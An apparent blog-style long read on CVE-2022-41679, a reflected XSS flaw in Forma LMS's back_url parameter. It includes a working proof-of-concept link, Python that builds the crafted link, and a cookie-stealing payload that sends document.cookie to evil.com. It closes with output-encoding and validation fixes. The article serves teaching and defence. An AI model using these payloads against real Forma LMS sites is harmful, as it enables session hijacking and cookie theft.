Forma LMS is a popular open-source Learning Management System used by organizations worldwide to deliver online courses. Up to and including version 3.1.0, Forma LMS contained a reflected cross-site scripting (XSS) bug that let an attacker run JavaScript of their choosing in a victim's browser, on the Forma LMS origin, simply by getting the victim to open a crafted link. This bug is tracked as CVE-2022-41679.
In this long read, we'll break down how the vulnerability works, walk through a working exploit, and show how serious the consequences can be if it is left unpatched. The material is aimed at readers with basic web security knowledge.
2. What is Cross-Site Scripting (XSS)?
Cross-Site Scripting (XSS) is a class of vulnerability in which an attacker injects client-side script, usually JavaScript, into a page that other users load, so that the script runs with the privileges of that site's origin. Depending on the application, this lets the attacker read cookies that are not flagged HttpOnly, perform actions with the victim's authenticated session (including administrative ones), or take over the account outright.
In Forma LMS 3.1.0 and earlier, the vulnerable endpoint is:
/appLms/index.php?modname=faq&op=play&back_url=<payload>
The back_url GET parameter is reflected into the generated HTML without output encoding. Whatever the parameter contains is written into the page as-is, so a JavaScript payload placed there executes in the browser of anyone who opens the crafted link. Because the value comes from the URL and is echoed straight back in the same response, this is a reflected XSS: no state is stored on the server and each victim must be lured to the link individually.
Here are some references for further reading and verification:
- Forma LMS Release Notes
- NVD Entry for CVE-2022-41679
- Forma LMS GitHub Repository
- OWASP XSS Cheat Sheet
3. Step-by-Step Exploit Explanation
Let’s see exactly how an attacker could use this bug, including sample code.
Proof of Concept (PoC) Exploit
Suppose you know a user has access to a Forma LMS instance at https://example.com/appLms/. You can craft the following malicious link:
https://example.com/appLms/index.php?modname=faq&op=play&back_url=%22%3E%3Cscript%3Ealert('XSS%20by%20attacker')%3C/script%3E
Decoding the URL-encoded characters in the back_url value:
- %22 → "
- %3C → <
- %3E → >
- %20 → (space)
- The rest is a classic script tag payload: <script>alert('XSS by attacker')</script>
So, the full payload is:
"><script>alert('XSS by attacker')</script>
The leading "> closes the attribute value and the tag into which back_url is reflected (an href-style attribute, for example), so the script element that follows is parsed as markup rather than as part of the attribute, and the browser executes it.
Example (Readable Link)
https://example.com/appLms/index.php?modname=faq&op=play&back_url="><script>alert('XSS by attacker')</script>
If a logged-in administrator or user is tricked into opening this link (for example, from an email or a message in the platform), the JavaScript runs in their browser on the Forma LMS origin, with access to that user's session.
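To make the steps above concrete, here is a small Python helper written for this article (it is not Forma LMS code). It builds the crafted link with the payload URL-encoded into back_url, decodes it the way the server will, and classifies a response body as reflecting the payload unencoded, HTML-encoded, or not at all. The example.com host is the article's placeholder, and the two response bodies are constructed stand-ins for a vulnerable and a patched server, not captured output.

```python
"""Build the CVE-2022-41679 PoC link and classify how a response reflects it.

Illustrative code written for this article, not Forma LMS code. The host
https://example.com is the article's placeholder; the sample response bodies
below are constructed, not captured from a real server.
"""
from html import escape
from urllib.parse import parse_qs, urlencode, urlparse

# The payload from the article: break out of the attribute, then inject a script tag.
PAYLOAD = "\"><script>alert('XSS by attacker')</script>"


def build_poc_url(base: str, payload: str = PAYLOAD) -> str:
    """Return the crafted link with the payload URL-encoded into back_url."""
    query = urlencode({"modname": "faq", "op": "play", "back_url": payload})
    return f"{base.rstrip('/')}/index.php?{query}"


def extract_back_url(url: str) -> str:
    """URL-decode back_url exactly as the server-side request parser will see it."""
    return parse_qs(urlparse(url).query)["back_url"][0]


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Classify how a response body reflected the payload.

    'unencoded'     -> payload appears verbatim: exploitable reflected XSS
    'html-encoded'  -> payload appears with < and > escaped: not exploitable
    'not-reflected' -> payload absent from the response
    """
    if payload in body:
        return "unencoded"
    # Any HTML encoding (PHP htmlspecialchars, Python html.escape, ...) turns the
    # opening tag into &lt;script&gt;, so look for that marker from the payload.
    if "&lt;script&gt;alert(" in body:
        return "html-encoded"
    return "not-reflected"


# Constructed response fragments standing in for a vulnerable and a patched server.
VULNERABLE_BODY = '<a class="back" href="' + PAYLOAD + '">Back</a>'
FIXED_BODY = '<a class="back" href="' + escape(PAYLOAD, quote=True) + '">Back</a>'

if __name__ == "__main__":
    url = build_poc_url("https://example.com/appLms")
    print("crafted link   :", url)
    print("server decodes :", extract_back_url(url))
    print("vulnerable body:", classify_reflection(VULNERABLE_BODY))
    print("patched body   :", classify_reflection(FIXED_BODY))
```

The printed link differs only cosmetically from the one above (urlencode also escapes the quote, parentheses and slash, and writes the space as +); it decodes to the same payload. Against a live target you would substitute the real response body for the constructed ones, and only with permission to test.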
4. Stealing Cookies with XSS
Let’s upgrade the attack. An attacker can steal cookies using a payload like this (injected into back_url):
"><script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
This causes the victim's browser to send the cookies readable by script to the attacker's server at evil.com. The fetch is cross-origin, so the script cannot read the response, but the request itself is still sent, which is all the attacker needs. One caveat: cookies flagged HttpOnly are not exposed through document.cookie. If the session cookie carries that flag the attacker cannot copy it, but the injected script still runs inside the victim's authenticated session and can issue requests on their behalf, so the flag limits the impact without removing it.
Example Exploit Snippet
fetch('https://evil.com/steal?cookie=' + document.cookie);
Here is what the resulting request would look like in the attacker's server log (the cookie values are illustrative):
GET /steal?cookie=PHPSESSID=abc123; user=admin HTTP/1.1
Host: evil.com
5. How to Fix This Vulnerability
The fix is context-appropriate output encoding of every untrusted value at the point it is written into HTML, backed by input validation where the value has a narrow expected shape. back_url is such a value: it should only ever be a path within the application, so anything else can be rejected and replaced with a safe default.
Key recommendations:
- Escape untrusted input on output: use htmlspecialchars with ENT_QUOTES and an explicit UTF-8 charset when echoing values into HTML in PHP, and encode for the specific context (attribute, element body, URL, JavaScript) rather than relying on one generic filter.
- Validate back_url before use: accept only a relative path on the same site and fall back to a known page otherwise. This also closes the open-redirect use of the same parameter.
- Harden the session cookie with the HttpOnly and SameSite attributes so that a script injection cannot simply read and replay it.
- Upgrade Forma LMS to a release that fixes CVE-2022-41679.
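As an added illustration of the encoding and validation recommendations above, not Forma LMS code (Forma is PHP, where the equivalent encoding call is htmlspecialchars($v, ENT_QUOTES, 'UTF-8')), the Python below places the vulnerable pattern of concatenating back_url into an href next to a hardened version that first validates the value as a relative, same-site path and then HTML-attribute-encodes it. The fallback path and the anchor template are assumptions made for the example.

```python
"""Validate and encode a back_url-style parameter before echoing it into HTML.

Illustrative Python written for this article; Forma LMS is PHP, where the
encoding step is htmlspecialchars($v, ENT_QUOTES, 'UTF-8'). The default path
and the <a> template below are assumptions, not Forma LMS code.
"""
from html import escape
from urllib.parse import urlsplit

DEFAULT_BACK_URL = "/appLms/index.php"  # assumed safe fallback page

# The payload from the article, used to exercise both renderers.
EXPLOIT = "\"><script>alert('XSS by attacker')</script>"


def render_back_link_vulnerable(back_url: str) -> str:
    """The pattern behind CVE-2022-41679: untrusted input concatenated into HTML."""
    return f'<a href="{back_url}">Back</a>'


def validate_back_url(raw: str) -> str:
    """Accept only a relative, same-site path; otherwise return the safe default.

    Rejects empty or oversized values, control characters, backslashes (browsers
    treat '/\\evil.com' like '//evil.com'), absolute URLs, scheme-relative
    '//host' URLs and javascript: URIs. Validation narrows the input; it does
    not replace output encoding.
    """
    if not raw or len(raw) > 2048:
        return DEFAULT_BACK_URL
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw) or "\\" in raw:
        return DEFAULT_BACK_URL
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc or not raw.startswith("/") or raw.startswith("//"):
        return DEFAULT_BACK_URL
    return raw


def render_back_link_fixed(back_url: str) -> str:
    """Validate, then HTML-attribute-encode on output. Both steps are needed:
    validation stops redirects off-site, encoding stops markup injection even
    for values that pass validation (a path may legitimately contain quotes)."""
    safe = escape(validate_back_url(back_url), quote=True)
    return f'<a href="{safe}">Back</a>'


if __name__ == "__main__":
    print("vulnerable:", render_back_link_vulnerable(EXPLOIT))
    print("fixed     :", render_back_link_fixed(EXPLOIT))
    print("fixed     :", render_back_link_fixed('/appLms/index.php?modname=faq&op=play'))
    print("fixed     :", render_back_link_fixed('/appLms/index.php?a="'))
```

With the payload as input the vulnerable renderer emits a live script tag, while the hardened one falls back to the default page; with a legitimate path that happens to contain a quote, validation passes and encoding turns the quote into &quot; so the attribute cannot be broken out of.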
6. Conclusion
CVE-2022-41679 is a reminder of why output encoding and input validation are critical for web security. If you are running Forma LMS 3.1.0 or earlier, upgrade to a fixed release today, and always treat user-supplied data as unsafe until it has been validated and encoded for the context in which it is used.
Stay safe, and always keep your software updated!
Further Reading:
- OWASP XSS Prevention Cheat Sheet
- Forma LMS GitHub Security Fixes
Note: This article is for educational awareness only. Do not exploit this vulnerability on systems you do not own or have permission to test.
Timeline
Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 19:57:00 UTC